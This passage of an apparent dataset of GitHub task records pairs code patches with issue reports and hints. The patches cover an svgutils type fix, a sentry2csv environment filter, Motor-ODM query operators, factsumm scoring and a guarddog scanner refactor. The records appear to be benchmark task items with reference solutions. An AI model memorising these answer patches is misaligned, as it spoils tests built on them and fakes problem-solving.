- self.height = height
+ try:
+ self._height = height.value
+ except AttributeError:
+ self._height = height
@property
def width(self):
| Unknown expected types for SVGFigure parameters
The recently released 0.3.2 has resulted in the following (truncated) traceback:
```Python
File "/usr/local/miniconda/lib/python3.7/site-packages/niworkflows/viz/utils.py", line 360, in compose_view
fig = SVGFigure(width, heights[:nsvgs].sum())
File "/usr/local/miniconda/lib/python3.7/site-packages/svgutils/transform.py", line 242, in __init__
self._width = width.value
AttributeError: 'numpy.int64' object has no attribute 'value'
```
Looking at the [docs for SVGFigure](https://svgutils.readthedocs.io/en/latest/transform.html#svgutils.transform.SVGFigure), a numeric value seems appropriate. I'm not sure what sort of object with a `.value` attribute is expected to fix our invocation, so currently I'm pinning 0.3.1.
Issue introduced in #27.
Unknown expected types for SVGFigure parameters
The recently released 0.3.2 has resulted in the following (truncated) traceback:
```Python
File "/usr/local/miniconda/lib/python3.7/site-packages/niworkflows/viz/utils.py", line 360, in compose_view
fig = SVGFigure(width, heights[:nsvgs].sum())
File "/usr/local/miniconda/lib/python3.7/site-packages/svgutils/transform.py", line 242, in __init__
self._width = width.value
AttributeError: 'numpy.int64' object has no attribute 'value'
```
Looking at the [docs for SVGFigure](https://svgutils.readthedocs.io/en/latest/transform.html#svgutils.transform.SVGFigure), a numeric value seems appropriate. I'm not sure what sort of object with a `.value` attribute is expected to fix our invocation, so currently I'm pinning 0.3.1.
Issue introduced in #27.
| thanks for reporting, I am looking into it
thanks for reporting, I am looking into it | 2021-01-07T09:42:29 | 0.0 | [] | [] |
||
sparkmeter/sentry2csv | sparkmeter__sentry2csv-21 | 8b2b76992c01cc74a8f18fc8c86907afc9ec960c | diff --git a/sentry2csv/sentry2csv.py b/sentry2csv/sentry2csv.py
index 54c55ca..85213bd 100755
--- a/sentry2csv/sentry2csv.py
+++ b/sentry2csv/sentry2csv.py
@@ -27,6 +27,17 @@ def __init__(self, message): # pylint: disable=super-init-not-called
self.message = message
+@dataclass(frozen=True)
+class QueryParam:
+ """A key-value pair for the Sentry query string."""
+
+ field: str
+ value: str
+
+ def __repr__(self):
+ return f"{self.field}:{self.value}"
+
+
@dataclass
class Enrichment:
"""An enrichment."""
@@ -68,17 +79,25 @@ async def enrich_issue(
issue["_enrichments"][enrichment.csv_field] = ""
-async def fetch_issues(session: aiohttp.ClientSession, issues_url: str) -> List[Dict[str, Any]]:
+async def fetch_issues(
+ session: aiohttp.ClientSession, issues_url: str, query_params: List[QueryParam]
+) -> List[Dict[str, Any]]:
"""Fetch all issues from Sentry."""
page_count = 1
issues: List[Dict[str, Any]] = []
cursor = ""
+ query_str = " ".join(str(param) for param in query_params)
while True:
print(f"Fetching issues page {page_count}")
resp, links = await fetch(
- session, issues_url, params={"cursor": cursor, "statsPeriod": "", "query": "is:unresolved"}
+ session, issues_url, params={"cursor": cursor, "statsPeriod": "", "query": query_str}
)
logger.debug("Received page %s", resp)
+ if isinstance(resp, dict):
+ if "detail" in resp:
+ raise Sentry2CSVException(
+ f"Failed to query Sentry. Received unexpected response: {resp['detail']}"
+ )
assert isinstance(resp, list), f"Bad response type. Expected list, got {type(resp)}"
issues.extend(resp)
if links.get("next", cast(MultiDictProxy[Union[str, URL]], MultiDict())).get("results") != "true":
@@ -130,15 +149,20 @@ def write_csv(filename: str, issues: List[Dict[str, Any]]):
raise Sentry2CSVException("Unexpected API response. Run with -vv to debug.") from kerr
-async def export(
- token: str, organization: str, project: str, enrich: Optional[List[Enrichment]] = None, host: str = SENTRY_HOST
+async def export( # pylint:disable=too-many-arguments
+ token: str,
+ organization: str,
+ project: str,
+ query_params: List[QueryParam],
+ enrich: Optional[List[Enrichment]] = None,
+ host: str = SENTRY_HOST,
):
"""Export data from Sentry to CSV."""
enrichments: List[Enrichment] = enrich or []
issues_url = f"https://{host}/api/0/projects/{organization}/{project}/issues/"
async with aiohttp.ClientSession(headers={"Authorization": f"Bearer {token}"}) as session:
try:
- issues = await fetch_issues(session, issues_url)
+ issues = await fetch_issues(session, issues_url, query_params)
if enrichments:
print(f"Enriching {len(issues)} issues with event data...")
await asyncio.gather(
@@ -178,6 +202,13 @@ def main():
default=[SENTRY_HOST],
help=f"The Sentry host [default: {SENTRY_HOST}]",
)
+ parser.add_argument(
+ "--environment",
+ metavar="ENVIRONMENT_NAME",
+ nargs=1,
+ required=False,
+ help="The name of the environment to query",
+ )
parser.add_argument("organization", metavar="ORGANIZATION", nargs=1, help="The Sentry organization")
parser.add_argument("project", metavar="PROJECT", nargs=1, help="The Sentry project")
args = parser.parse_args()
@@ -188,9 +219,19 @@ def main():
else:
logger.setLevel(logging.WARNING)
enrichments = extract_enrichment(args.enrich)
+ query_params: List[QueryParam] = [QueryParam("is", "unresolved")]
+ if args.environment:
+ query_params.append(QueryParam("environment", args.environment[0]))
loop = asyncio.get_event_loop()
loop.run_until_complete(
- export(args.token[0], args.organization[0], args.project[0], enrich=enrichments, host=args.host[0])
+ export(
+ args.token[0],
+ args.organization[0],
+ args.project[0],
+ enrich=enrichments,
+ host=args.host[0],
+ query_params=query_params,
+ )
)
diff --git a/setup.py b/setup.py
index f975063..63ba7ca 100644
--- a/setup.py
+++ b/setup.py
@@ -61,7 +61,7 @@ def find_version(*file_paths):
"dev": [
"aioresponses==0.7.3",
"asynctest==0.13.0",
- "black==19.3b0",
+ "black==22.3.0",
"mypy==0.931",
"mypy-extensions==0.4.3",
"types-setuptools==57.4.9",
@@ -70,6 +70,7 @@ def find_version(*file_paths):
"pytest-asyncio==0.18.1",
"pytest-cov==2.8.1",
"pytest-mock==1.11.2",
+ "typing-extensions==4.2.0",
]
},
python_requires=">=3.7",
| Feature Request: fetch issues by environment
Is there a way to fetch issues from a certain environment?
| Hi, thanks for reaching out! You are correct - this cannot be done at the moment. However, this seems like a straightforward and reasonable thing for us to support.
For your use case, could you describe what your ideal input would be (e.g. an argument with a string), and whether or not you'd expect the environment name to be printed in the CSV output?
Ideally, my input should be `--environment production`, and the environment name couldn't be printed in the CSV output, unless my input is a regex. BTW, the CSV output should print the last event time of an issue. | 2022-05-24T20:08:02 | 0.0 | [] | [] |
||
codello/Motor-ODM | codello__Motor-ODM-24 | 968448e752d10129919b40a8cbb7a91a63ba96b7 | diff --git a/motor_odm/query.py b/motor_odm/query.py
index 67ef1f7..7d08585 100644
--- a/motor_odm/query.py
+++ b/motor_odm/query.py
@@ -47,6 +47,12 @@ def q(*args: Any, **kwargs: Any) -> "Query":
>>> q(age__gt=20, age__lt=100)
{'age': {'$gt': 20, '$lt': 100}}
+
+ Lastly you can combine queries with ``&``, ``|`` and ``^``. The ``^`` operator means
+ *nor* in this case.
+
+ >>> (q(age=20) & q(name="John")) | q(age=21)
+ {'$or': [{'$and': [{'age': 20}, {'name': 'John'}]}, {'age': 21}]}
"""
return Query(*args, **kwargs)
@@ -133,7 +139,7 @@ def __init__(self, *args: Any, **kwargs: Any) -> None:
self["_id"] = {"$in": ids}
self.extend(**kwargs)
- def extend(self, **kwargs: Any) -> None:
+ def extend(self, **kwargs: "DictStrAny") -> None:
"""Adds fields to this query.
This method adds the same keys and values that you would get using the :func:`q`
@@ -190,6 +196,24 @@ def comment(self, comment: str) -> "Query":
self["$comment"] = comment
return self
+ def __and__(self, other: dict) -> "Query":
+ assert isinstance(other, dict)
+ query = Query()
+ query.update({"$and": [self, other]})
+ return query
+
+ def __or__(self, other: dict) -> "Query":
+ assert isinstance(other, dict)
+ query = Query()
+ query.update({"$or": [self, other]})
+ return query
+
+ def __xor__(self, other: dict) -> "Query":
+ assert isinstance(other, dict)
+ query = Query()
+ query.update({"$nor": [self, other]})
+ return query
+
def _transform_op(op: Optional[str]) -> str:
"""Transforms an operator for MongoDB compatibility.
| Combined Queries
Queries should implement boolean operators using standard python syntax. Example:
```python
>>> q(name="name") & q(age=20)
{"$and": [{"name": "name"}, {"age": 20}]
```
| 2020-04-13T21:49:16 | 0.0 | [] | [] |
|||
Huffon/factsumm | Huffon__factsumm-16 | f79fd6ab98ecefbb99366deb819fba47f8dc9a56 | diff --git a/README.md b/README.md
index 21457f1..ec2dee4 100644
--- a/README.md
+++ b/README.md
@@ -16,13 +16,7 @@ So don't blame me, just take it as a concept project 👀
## Installation
-`FactSumm` requires *Java* to be installed in your environment to use **Stanford OpenIE**. With *Java* and *Python 3*, you can install `factsumm` simply using `pip`:
-
-```bash
-pip install factsumm
-```
-
-Or you can install it from source repository:
+`FactSumm` requires *Java* to be installed in your environment to use **Stanford OpenIE**. With *Java* and *Python 3*, you can install `FactSumm` from source repository:
```bash
git clone https://github.com/huffon/factsumm
@@ -39,7 +33,7 @@ pip install .
>>> factsumm = FactSumm()
>>> article = "Superman is a fictional superhero who first appeared in American comic books published by DC Comics. The character was created by writer Jerry Siegel and artist Joe Shuster, and first appeared in the comic book Action Comics #1. Superman has been adapted to a number of other media which includes radio serials, novels, movies, television shows and theatre. Although Superman was not the first superhero character, he popularized the superhero archetype and established its conventions. Superheroes are usually judged by how closely they resemble the standard set by Superman. He was the best-selling superhero character in American comic books up until the 1980s."
>>> summary = "Superman is a fictional superhero who first appeared in American comic books published by Marvel Comics. The character was created by writer Jerry Siegel and artist Joe Shuster. He popularized the superhero archetype and established its conventions. Superman has been adapted to a number of other media which includes radio serials, novels, movies, television shows and theatre."
->>> factsumm(article, summary)
+>>> factsumm(article, summary, verbose=True)
SOURCE Entities
1: [('Superman', 'PER'), ('American', 'MISC'), ('DC Comics', 'ORG')]
2: [('Jerry Siegel', 'PER'), ('Joe Shuster', 'PER'), ('Action Comics', 'MISC')]
@@ -56,58 +50,69 @@ SUMMARY Entities
SOURCE Facts
('American', 'per:alternate_names', 'Superman')
+('American', 'per:employee_of', 'DC Comics')
+('DC Comics', 'org:country_of_headquarters', 'American')
('Superman', 'per:employee_of', 'DC Comics')
('Superman', 'per:origin', 'American')
-('DC Comics', 'org:country_of_headquarters', 'American')
-('American', 'per:employee_of', 'DC Comics')
SUMMARY Facts
+('American', 'per:alternate_names', 'Superman')
+('Marvel Comics', 'org:country_of_headquarters', 'American')
('Superman', 'per:employee_of', 'Marvel Comics')
('American', 'per:employee_of', 'Marvel Comics')
-('Marvel Comics', 'org:country_of_headquarters', 'American')
-('American', 'per:alternate_names', 'Superman')
('Superman', 'per:origin', 'American')
COMMON Facts
-('Superman', 'per:origin', 'American')
('American', 'per:alternate_names', 'Superman')
+('Superman', 'per:origin', 'American')
DIFF Facts
-('American', 'per:employee_of', 'Marvel Comics')
('Marvel Comics', 'org:country_of_headquarters', 'American')
('Superman', 'per:employee_of', 'Marvel Comics')
+('American', 'per:employee_of', 'Marvel Comics')
-SOURCE Questions
-[Q] What is the name of the fictional superhero that first appeared in comic books? [A] Superman [Pred] Superman
-[Q] In what country did Superman first appear? [A] American [Pred] American
-[Q] What company published Superman comics? [A] DC Comics [Pred] DC Comics
-[Q] Who created the character? [A] Jerry Siegel [Pred] Jerry Siegel and artist Joe Shuster
-[Q] Who created the character of the 'Action Comics'? [A] Joe Shuster [Pred] <unanswerable>
-[Q] What comic book did the character first appear in? [A] Action Comics [Pred] Action Comics #1
-[Q] What superhero has been adapted to a number of other media? [A] Superman [Pred] Superman
-[Q] What was the name of the first superhero? [A] Superman [Pred] <unanswerable>
-[Q] Whose standard is a super hero compared to? [A] Superman [Pred] Superman
-[Q] What nationality was the character of the main character? [A] American [Pred] <unanswerable>
-
-SUMMARY Questions
-[Q] What is the name of the fictional superhero that first appeared in comic books? [A] Superman [Pred] Superman
-[Q] In what country did Superman first appear? [A] American [Pred] American
-[Q] What company published the first Superman comic book? [A] Marvel Comics [Pred] Marvel Comics
-[Q] Who created the character? [A] Jerry Siegel [Pred] Jerry Siegel and artist Joe Shuster
-[Q] Who created the character? [A] Joe Shuster [Pred] Jerry Siegel and artist Joe Shuster
-[Q] What superhero has been adapted to a number of other media? [A] Superman [Pred] Superman
-
-DIFF Questions
-[Q] What is the name of the fictional superhero that first appeared in comic books? [A] Superman [Pred] Superman
-[Q] In what country did Superman first appear? [A] American [Pred] American
-[Q] What company published Superman comics? [A] DC Comics [Pred] Marvel Comics
-[Q] Who created the character? [A] Jerry Siegel [Pred] Jerry Siegel and artist Joe Shuster
-[Q] Who created the character of the 'Action Comics'? [A] Joe Shuster [Pred] <unanswerable>
-[Q] What comic book did the character first appear in? [A] Action Comics [Pred] Marvel Comics
-[Q] What superhero has been adapted to a number of other media? [A] Superman [Pred] Superman
-[Q] What was the name of the first superhero? [A] Superman [Pred] Superman
-[Q] Whose standard is a super hero compared to? [A] Superman [Pred] conventions
-[Q] What nationality was the character of the main character? [A] American [Pred] American
+Fact Score: 0.4
+
+Answers based on SOURCE (Questions are generated from Summary)
+[Q] What is the name of the fictional superhero that first appeared in comic books? [Ent] Superman [Pred] Superman
+[Q] In what country did Superman first appear? [Ent] American [Pred] American
+[Q] What company published the first Superman comic book? [Ent] Marvel Comics [Pred] DC Comics
+[Q] Who created the character? [Ent] Jerry Siegel [Pred] Jerry Siegel and artist Joe Shuster
+[Q] Who created the character? [Ent] Joe Shuster [Pred] Jerry Siegel and artist Joe Shuster
+[Q] What superhero has been adapted to a number of other media? [Ent] Superman [Pred] Superman
+
+Answers based on SUMMARY (Questions are generated from Summary)
+[Q] What is the name of the fictional superhero that first appeared in comic books? [Ent] Superman [Pred] Superman
+[Q] In what country did Superman first appear? [Ent] American [Pred] American
+[Q] What company published the first Superman comic book? [Ent] Marvel Comics [Pred] Marvel Comics
+[Q] Who created the character? [Ent] Jerry Siegel [Pred] Jerry Siegel and artist Joe Shuster
+[Q] Who created the character? [Ent] Joe Shuster [Pred] Jerry Siegel and artist Joe Shuster
+[Q] What superhero has been adapted to a number of other media? [Ent] Superman [Pred] Superman
+
+QAGS Score: 0.9166666666666666
+
+SOURCE Triples
+('they', 'closely resemble', 'standard set')
+('He', 'was', 'best selling character')
+('He', 'was', 'best selling character in comic books up until 1980s')
+('He', 'was', 'superhero character in comic books up until 1980s')
+('Superman', 'is fictional superhero', 'appeared in books published by DC Comics')
+('he', 'established', 'its conventions')
+...
+
+SUMMARY Triples
+('Superman', 'is fictional superhero', 'first appeared in American books published by Marvel Comics')
+('Superman', 'is fictional superhero', 'first appeared in American comic books published by Marvel Comics')
+('He', 'established', 'its conventions')
+('Superman', 'is fictional superhero', 'first appeared in American books')
+('Superman', 'is fictional superhero', 'first appeared in American comic books published')
+...
+
+Triple Score: 0.6774193548387096
+
+Avg. ROUGE-1: 0.34586498627159923
+Avg. ROUGE-2: 0.24065908743388897
+Avg. ROUGE-L: 0.30456185003002245
```
<br>
@@ -118,15 +123,14 @@ From [here](https://arxiv.org/pdf/2104.14839.pdf), you can find various way to s
<br>
-### Triple-based Factual Consistency
+### Triple-based Module
-count the fact overlap between generated summary and the source document
-not combination, but permutation
+The triple-based module counts the overlap of fact triples between the generated summary and the source document.
<br>
-### QA-based Factual Consistency
+### QA-based Module

@@ -134,6 +138,22 @@ If you ask questions about the summary and the source document, you will get a s
<br>
+### OpenIE-based Module
+
+Stanford OpenIE can extract relationships from raw strings. But it's important to note that it's based on the open scheme, not the closed scheme (like `Triple-based Module`).
+
+For example, from `"Obama was born in Hawaii"`, OpenIE extracts (Obama, born in Hawaii). However, from `"Hawaii is the birthplace of Obama"`, it extracts (Hawaii, is the birthplace of, Obama). In common sense, the triples extracted from the two sentences should be identical, but OpenIE can't recognize that they are the same since it is based on an open scheme.
+
+So the score for this module may be unstable
+
+<br>
+
+### ROUGE-based Module
+
+Simple but effective word-level overlap ROUGE score
+
+<br>
+
## References
- [HuggingFace Transformers](https://github.com/huggingface/transformers)
@@ -141,3 +161,5 @@ If you ask questions about the summary and the source document, you will get a s
- [PySBD](https://github.com/nipunsadvilkar/pySBD)
- [The Factual Inconsistency Problem in Abstractive Text Summarization: A Survey](https://arxiv.org/abs/2104.14839.pdf)
- [Assessing The Factual Accuracy of Generated Text](https://arxiv.org/abs/1905.13322.pdf)
+- [Asking and Answering Questions to Evaluate the Factual Consistency of Summaries](https://arxiv.org/abs/2004.04228)
+- [FEQA: A Question Answering Evaluation Framework for Faithfulness Assessment in Abstractive Summarization](https://arxiv.org/abs/2005.03754)
diff --git a/factsumm/__init__.py b/factsumm/__init__.py
index 65c8add..4e8682c 100644
--- a/factsumm/__init__.py
+++ b/factsumm/__init__.py
@@ -9,7 +9,7 @@
from factsumm.utils.level_entity import load_ie, load_ner, load_rel
from factsumm.utils.level_sentence import load_qa, load_qg
-from factsumm.utils.utils import Config
+from factsumm.utils.utils import Config, qags_score
os.environ["TOKENIZERS_PARALLELISM"] = "false"
logging.getLogger("transformers").setLevel(logging.ERROR)
@@ -35,33 +35,58 @@ def __init__(
self.qa = qa_model if qa_model is not None else self.config.QA_MODEL
self.ie = None
- def build_comb(
+ def build_perm(
self,
lines: List[str],
total_entities: Union[List[Dict], List[List[Dict]]],
):
- total_combs = list()
+ """
+ Build entity permutations for Relation Extraction
+
+ Args:
+ lines (List[str]): segmented document lines
+ total_entities (Union[List[Dict], List[List[Dict]]]): list of total entities
+
+ Returns:
+ List: list of permutations
+
+ """
+ total_perms = list()
for line, line_entities in zip(lines, total_entities):
- line_combs = list(permutations(line_entities, 2))
+ line_perms = list(permutations(line_entities, 2))
- line_combs = [{
+ line_perms = [{
"text":
line,
"spans": [
(comb[0]["start"], comb[0]["end"]),
(comb[-1]["start"], comb[-1]["end"]),
]
- } for comb in line_combs]
+ } for comb in line_perms]
- total_combs.append(line_combs)
+ total_perms.append(line_perms)
- return total_combs
+ return total_perms
def count_facts(self, lines: List[str], entities: List[List[Dict]]):
- combs = self.build_comb(lines, entities)
- triples = {self.rel(comb) for comb in combs}
- return triples
+ """[summary]
+
+ Args:
+ lines (List[str]): segmented document lines
+ entities (List[List[Dict]]): list of total entities
+
+ Returns:
+ Set: set of relation inferenced from permutations
+
+ """
+ perms = self.build_perm(lines, entities)
+ triples = list()
+
+ for perm in perms:
+ triples.extend(self.rel(perm))
+
+ return set(triples)
def _segment(self, text: str):
return [line.strip() for line in self.segmenter.segment(text)]
@@ -75,10 +100,36 @@ def _print_entities(self, mode: str, total_entities: List[List[Dict]]):
print()
def calculate_rouge(self, source: str, summary: str):
- rouge_1 = self.rouge.rouge_n(source, summary, 1)
- rouge_2 = self.rouge.rouge_n(source, summary, 2)
- rouge_l = self.rouge.rouge_l(source, summary)
- return rouge_1, rouge_2, rouge_l
+ """
+ Calculate ROUGE score
+
+ Args:
+ source (str): original source
+ summary (str): generated summary
+
+ Returns:
+ Tuple: (ROUGE-1, ROUGE-2, ROUGE-L) tuple
+
+ """
+ source_lines = self._segment(source)
+ num_lines = len(source_lines)
+
+ rouge_1 = 0.0
+ rouge_2 = 0.0
+ rouge_l = 0.0
+ for source_line in source_lines:
+ rouge_1 += self.rouge.rouge_n(summary, source_line, 1)
+ rouge_2 += self.rouge.rouge_n(summary, source_line, 2)
+ rouge_l += self.rouge.rouge_l(summary, source_line)
+
+ avg_rouge_1 = rouge_1 / num_lines
+ avg_rouge_2 = rouge_2 / num_lines
+ avg_rouge_l = rouge_l / num_lines
+
+ print(
+ f"Avg. ROUGE-1: {avg_rouge_1}\nAvg. ROUGE-2: {avg_rouge_2}\nAvg. ROUGE-L: {avg_rouge_l}"
+ )
+ return avg_rouge_1, avg_rouge_2, avg_rouge_l
def _print_facts(self, mode: str, facts: Set[Tuple]):
print(f"{mode.upper()} Facts")
@@ -86,7 +137,18 @@ def _print_facts(self, mode: str, facts: Set[Tuple]):
print(fact)
print()
- def extract_facts(self, source: str, summary: str):
+ def extract_facts(self, source: str, summary: str, verbose: bool = False):
+ """
+ Extract (head_entity, relation, tail_entity) relation triple using NER & RE module
+
+ See also https://arxiv.org/abs/1905.13322.pdf
+
+ Args:
+ source (str): original source
+ summary (str): generated summary
+ verbose (bool, optional): print verbose option. Defaults to False.
+
+ """
if isinstance(self.ner, str) and isinstance(self.rel, str):
self.ner = load_ner(self.ner)
self.rel = load_rel(self.rel)
@@ -98,9 +160,6 @@ def extract_facts(self, source: str, summary: str):
source_ents = self.ner(source_lines)
summary_ents = self.ner(summary_lines)
- self._print_entities("source", source_ents)
- self._print_entities("summary", summary_ents)
-
# extract entity-based triple: (head, relation, tail)
source_facts = self.count_facts(source_lines, source_ents)
summary_facts = self.count_facts(summary_lines, summary_ents)
@@ -108,18 +167,28 @@ def extract_facts(self, source: str, summary: str):
common_facts = summary_facts.intersection(source_facts)
diff_facts = summary_facts.difference(source_facts)
- self._print_facts("source", source_facts)
- self._print_facts("summary", summary_facts)
+ if verbose:
+ self._print_entities("source", source_ents)
+ self._print_entities("summary", summary_ents)
+
+ self._print_facts("source", source_facts)
+ self._print_facts("summary", summary_facts)
+
+ self._print_facts("common", common_facts)
+ self._print_facts("diff", diff_facts)
- self._print_facts("common", common_facts)
- self._print_facts("diff", diff_facts)
- return source_ents, summary_ents
+ fact_score = len(common_facts) / len(summary_facts)
+ print(f"Fact Score: {fact_score}")
+
+ return source_ents, summary_ents, fact_score
def _print_qas(self, mode: str, questions: List[Dict]):
- print(f"{mode.upper()} Questions")
+ print(
+ f"Answers based on {mode.upper()} (Questions are generated from Summary)"
+ )
for question in questions:
print(
- f"[Q] {question['question']}\t[A] {question['answer']}\t[Pred] {question['prediction']}"
+ f"[Q] {question['question']}\t[Ent] {question['answer']}\t[Pred] {question['prediction']}"
)
print()
@@ -129,7 +198,21 @@ def extract_qas(
summary: str,
source_ents: List = None,
summary_ents: List = None,
+ verbose: bool = False,
):
+ """
+ Extract Question & Answering Pair generated from Question Generation module
+
+ See also https://arxiv.org/abs/2004.04228
+
+ Args:
+ source (str): original source
+ summary (str): generated summary
+ source_ents (List, optional): named entities extracted from source. Defaults to None.
+ summary_ents (List, optional): named entities extracted from source. Defaults to None.
+ verbose (bool, optional): print verbose option. Defaults to False.
+
+ """
if isinstance(self.qg, str) and isinstance(self.qa, str):
self.qg = load_qg(self.qg)
self.qa = load_qa(self.qa)
@@ -146,28 +229,74 @@ def extract_qas(
if summary_ents is None:
summary_ents = self.ner(summary_lines)
- source_qas = self.qg(source_lines, source_ents)
summary_qas = self.qg(summary_lines, summary_ents)
- source_answers = self.qa(source, source_qas)
+ source_answers = self.qa(source, summary_qas)
summary_answers = self.qa(summary, summary_qas)
- diff_answers = self.qa(summary, source_qas)
- self._print_qas("source", source_answers)
- self._print_qas("summary", summary_answers)
- self._print_qas("diff", diff_answers)
+ if verbose:
+ self._print_qas("source", source_answers)
+ self._print_qas("summary", summary_answers)
- def extract_triples(self, source: str, summary: str):
- if self.ie is None:
- self.ie = load_ie()
+ qa_score = qags_score(source_answers, summary_answers)
+ print(f"QAGS Score: {qa_score}\n")
+
+ return qa_score
+
+ def _print_triples(self, mode: str, triples: Set):
+ print(f"{mode.upper()} Triples")
+ for triple in triples:
+ print(triple)
+ print()
+
+ def extract_triples(self, source: str, summary: str, verbose: bool = False):
+ """
+ Extract OpenIE based fact triples
- source_triples = self.ie(source)
- summary_triples = self.ie(summary)
+ Args:
+ source (str): original source
+ summary (str): generated summary
+ verbose (bool, optional): print verbose option. Defaults to False.
- print(source_triples)
- print(summary_triples)
+ """
+ if self.ie is None:
+ self.ie = load_ie()
- def __call__(self, source: str, summary: str):
- source_ents, summary_ents = self.extract_facts(source, summary)
- self.extract_qas(source, summary, source_ents, summary_ents)
- self.extract_triples(source, summary)
+ source_triples = {(
+ triple["subject"],
+ triple["relation"],
+ triple["object"],
+ ) for triple in self.ie(source)}
+
+ summary_triples = {(
+ triple["subject"],
+ triple["relation"],
+ triple["object"],
+ ) for triple in self.ie(summary)}
+
+ if verbose:
+ self._print_triples("source", source_triples)
+ self._print_triples("summary", summary_triples)
+
+ common_triples = summary_triples.intersection(source_triples)
+ triple_score = len(common_triples) / len(summary_triples)
+
+ print(f"Triple Score: {triple_score}\n")
+
+ return triple_score
+
+ def __call__(self, source: str, summary: str, verbose: bool = False):
+ source_ents, summary_ents, fact_score = self.extract_facts(
+ source,
+ summary,
+ verbose,
+ )
+ qags_score = self.extract_qas(
+ source,
+ summary,
+ source_ents,
+ summary_ents,
+ verbose,
+ )
+ triple_score = self.extract_triples(source, summary, verbose)
+ self.calculate_rouge(source, summary)
diff --git a/factsumm/utils/utils.py b/factsumm/utils/utils.py
index 389da54..3b38198 100644
--- a/factsumm/utils/utils.py
+++ b/factsumm/utils/utils.py
@@ -1,3 +1,6 @@
+import re
+import string
+from collections import Counter
from dataclasses import dataclass
from typing import Dict, List
@@ -115,6 +118,73 @@ def load_summarizer(model: str) -> object:
)
+def f1_score(gold_answer: str, pred_answer: str):
+ """
+ Calculate token-level F1 score
+
+ See also https://github.com/W4ngatang/qags/blob/master/qa_utils.py#L43
+
+ Args:
+ gold_answer (str): answer selected based on source document
+ pred_answer (str): answer selected based on generated summary
+
+ """
+
+ def normalize_answer(s):
+
+ def remove_articles(text):
+ return re.sub(r'\b(a|an|the)\b', ' ', text)
+
+ def white_space_fix(text):
+ return ' '.join(text.split())
+
+ def remove_punc(text):
+ exclude = set(string.punctuation)
+ return ''.join(ch for ch in text if ch not in exclude)
+
+ return white_space_fix(remove_articles(remove_punc(s.lower())))
+
+ gold_toks = normalize_answer(gold_answer).split()
+ pred_toks = normalize_answer(pred_answer).split()
+
+ common_toks = Counter(gold_toks) & Counter(pred_toks)
+
+ num_same_toks = sum(common_toks.values())
+
+ # If either is no-answer, then F1 is 1 if they agree, 0 otherwise
+ if gold_answer == "<unanswerable>" or pred_answer == "<unanswerable>":
+ return int(gold_answer == pred_answer)
+
+ if num_same_toks == 0:
+ return 0
+
+ precision = 1.0 * num_same_toks / len(pred_toks)
+ recall = 1.0 * num_same_toks / len(gold_toks)
+ f1 = (2 * precision * recall) / (precision + recall)
+ return f1
+
+
+def qags_score(source_answers: List, summary_answers: List):
+ """
+ Caculate QAGS Score
+
+ See also https://arxiv.org/abs/2004.04228
+
+ Args:
+ source_answers (List): source answers selected based on source document
+ summary_answers (List): summary answers selected based on generated summary
+
+ """
+ scores = list()
+
+ for source_answer, summary_answer in zip(source_answers, summary_answers):
+ source_answer = source_answer["prediction"]
+ summary_answer = summary_answer["prediction"]
+ scores.append(f1_score(source_answer, summary_answer))
+
+ return sum(scores) / len(scores)
+
+
if __name__ == "__main__":
model = "elastic/distilbert-base-cased-finetuned-conll03-english"
| Apply naive score method for QA and RE
| Apply threshold for filtering high-confident fact triple and QA pair to be scored | 2021-05-11T20:15:35 | 0.0 | [] | [] |
||
DataDog/guarddog | DataDog__guarddog-426 | 8545867a71df48ce818039e9c8e8a48318db340b | diff --git a/README.md b/README.md
index c77b009b..49e84eeb 100644
--- a/README.md
+++ b/README.md
@@ -44,15 +44,11 @@ guarddog pypi scan requests --rules exec-base64 --rules code-execution
# Scan the 'requests' package using all rules but one
guarddog pypi scan requests --exclude-rules exec-base64
-# Scan a local package
+# Scan a local package archive
guarddog pypi scan /tmp/triage.tar.gz
-# Scan a local directory, the packages need to be located in the root directory
-# For instance you have several pypi packages in ./samples/ like:
-# ./samples/package1.tar.gz ./samples/package2.zip ./samples/package3.whl
-# FYI if a file not supported by guarddog is found you will get an error
-# Here is the command to scan a directory:
-guarddog pypi scan ./samples/
+# Scan a local package directory
+guarddog pypi scan /tmp/triage/
# Scan every package referenced in a requirements.txt file of a local folder
guarddog pypi verify workspace/guarddog/requirements.txt
diff --git a/guarddog/cli.py b/guarddog/cli.py
index e577d055..cacdf371 100644
--- a/guarddog/cli.py
+++ b/guarddog/cli.py
@@ -9,6 +9,7 @@
import logging
import os
import sys
+import tempfile
from typing import Optional, cast
import click
@@ -21,6 +22,7 @@
from guarddog.reporters.sarif import report_verify_sarif
from guarddog.scanners import get_scanner
from guarddog.scanners.scanner import PackageScanner
+from guarddog.utils.archives import safe_extract
EXIT_CODE_ISSUES_FOUND = 1
@@ -213,41 +215,30 @@ def _scan(
sys.stderr.write(f"Command scan is not supported for ecosystem {ecosystem}")
sys.exit(1)
- results = []
- if os.path.isdir(identifier):
- log.debug(f"Considering that '{identifier}' is a local directory")
- for package in os.listdir(identifier):
- result = scanner.scan_local(f"{identifier}/{package}", rule_param)
- result["package"] = package
- results.append(result)
- elif os.path.isfile(identifier):
- log.debug(f"Considering that '{identifier}' is a local file")
- result = scanner.scan_local(identifier, rule_param)
- result["package"] = identifier
- results.append(result)
- else:
- log.debug(f"Considering that '{identifier}' is a remote target")
- try:
- result = scanner.scan_remote(identifier, version, rule_param)
- result["package"] = identifier
- results.append(result)
- except Exception as e:
- sys.stderr.write(f"\nError '{e}' occurred while scanning remote package.")
- sys.exit(1)
+ result = {"package": identifier}
+ try:
+ if os.path.isdir(identifier):
+ log.debug(f"Considering that '{identifier}' is a local directory")
+ result |= scanner.scan_local(identifier, rule_param)
+ elif os.path.isfile(identifier):
+ log.debug(f"Considering that '{identifier}' is a local archive file")
+ with tempfile.TemporaryDirectory() as tempdir:
+ safe_extract(identifier, tempdir)
+ result |= scanner.scan_local(tempdir, rule_param)
+ else:
+ log.debug(f"Considering that '{identifier}' is a remote target")
+ result |= scanner.scan_remote(identifier, version, rule_param)
+ except Exception as e:
+ sys.stderr.write(f"Error occurred while scanning target {identifier}: '{e}'\n")
+ sys.exit(1)
if output_format == "json":
- if len(results) == 1:
- # return only a json like {}
- print(js.dumps(results[0]))
- else:
- # Return a list of result like [{},{}]
- print(js.dumps(results))
+ print(js.dumps(result))
else:
- for result in results:
- print_scan_results(result, result["package"])
+ print_scan_results(result, result["package"])
if exit_non_zero_on_finding:
- exit_with_status_code(results)
+ exit_with_status_code([result])
def _list_rules(ecosystem: ECOSYSTEM):
diff --git a/guarddog/scanners/scanner.py b/guarddog/scanners/scanner.py
index f23cdafe..610ad6b7 100644
--- a/guarddog/scanners/scanner.py
+++ b/guarddog/scanners/scanner.py
